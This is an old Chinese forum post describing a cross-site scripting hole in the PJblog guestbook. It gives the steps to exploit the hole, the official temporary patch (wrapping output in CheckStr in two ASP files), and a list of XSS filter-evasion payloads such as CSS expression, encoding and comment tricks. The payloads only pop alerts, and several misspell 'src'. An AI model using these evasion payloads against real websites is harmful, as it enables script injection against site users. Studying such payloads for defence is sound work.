|
|
PJblog最新跨站代码
随便找个PJBLOG 然后注册个用户..
登陆后 进入留言本
输入留言 记得在保密的地方那个框框 要勾上..
留言代码可以是这样:
xixi
当然 大家自由发挥还是更好..
官方论坛提供的暂时修正方法:
如果不用屏蔽关键字的办法。则使用下面的办法修补漏洞
打开 guestbook.asp 搜索
<%=UBBCode(HtmlEncode(GuestDB(\"book_Content\")),0,GBSet.getKeyValue(\"ubbCode\"),GBSet.getKeyValue(\"ImgCode\"),GBSet.getKeyValue(\"autoURL\"),1)%>
改为:
<%=CheckStr(UBBCode(HtmlEncode(GuestDB(\"book_Content\")),0,GBSet.getKeyValue(\"ubbCode\"),GBSet.getKeyValue(\"ImgCode\"),GBSet.getKeyValue(\"autoURL\"),1))%>
打开 cls_article.asp 搜索
<%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%>
改为:
<%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%>
本篇文章来源于 xixi's blog:http://www.wairi.cn
原文链接:http://www.wairi.cn/article.asp?id=949
<script>alert(\"跨站\")</script> (最常用)
<img scr=javascript:alert(\"跨站\")></img>
<img scr=\"javascript: alert(/跨站/)></img>
<img scr=\"javas????cript:alert(/跨站/)\" width=150></img> (?用tab键弄出来的空格)
<img scr=\"#\" onerror=alert(/跨站/)></img>
<img scr=\"#\" style=\"xss:expression(alert(/xss/));\"></img>
<img scr=\"#\"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
<img src=vbscript:msgbox (\"xss\")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\\0065\\0078ression (alert('xss'))}></div>
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style=\"{left:expRessioN (alert('xss'))}\"> |
|
发表于 2008-7-5 13:12:46